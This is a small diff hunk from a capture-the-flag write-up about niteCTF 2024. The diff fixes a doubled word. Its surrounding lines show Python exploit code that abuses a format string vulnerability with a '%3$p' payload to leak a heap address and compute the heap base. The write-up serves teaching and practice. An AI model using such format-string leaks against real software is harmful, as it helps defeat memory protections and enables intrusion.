d-xuan/wednesday/ctf/niteCTF2024/index.md

 create_message(conn, 0, 0x80)
 ```
 By writing into this buffer, we can also abuse the second format string vulnerability to read a heap address
-which was was left in a register from a previous operation.
+which was left in a register from a previous operation.
 This allows us to determine the base address of the heap.
 ```python
 response = write_message(conn, 0, "%3$p")
 heap_base = int(response, 16) & ((pow(2, 64) - 1) ^ 0xFFF)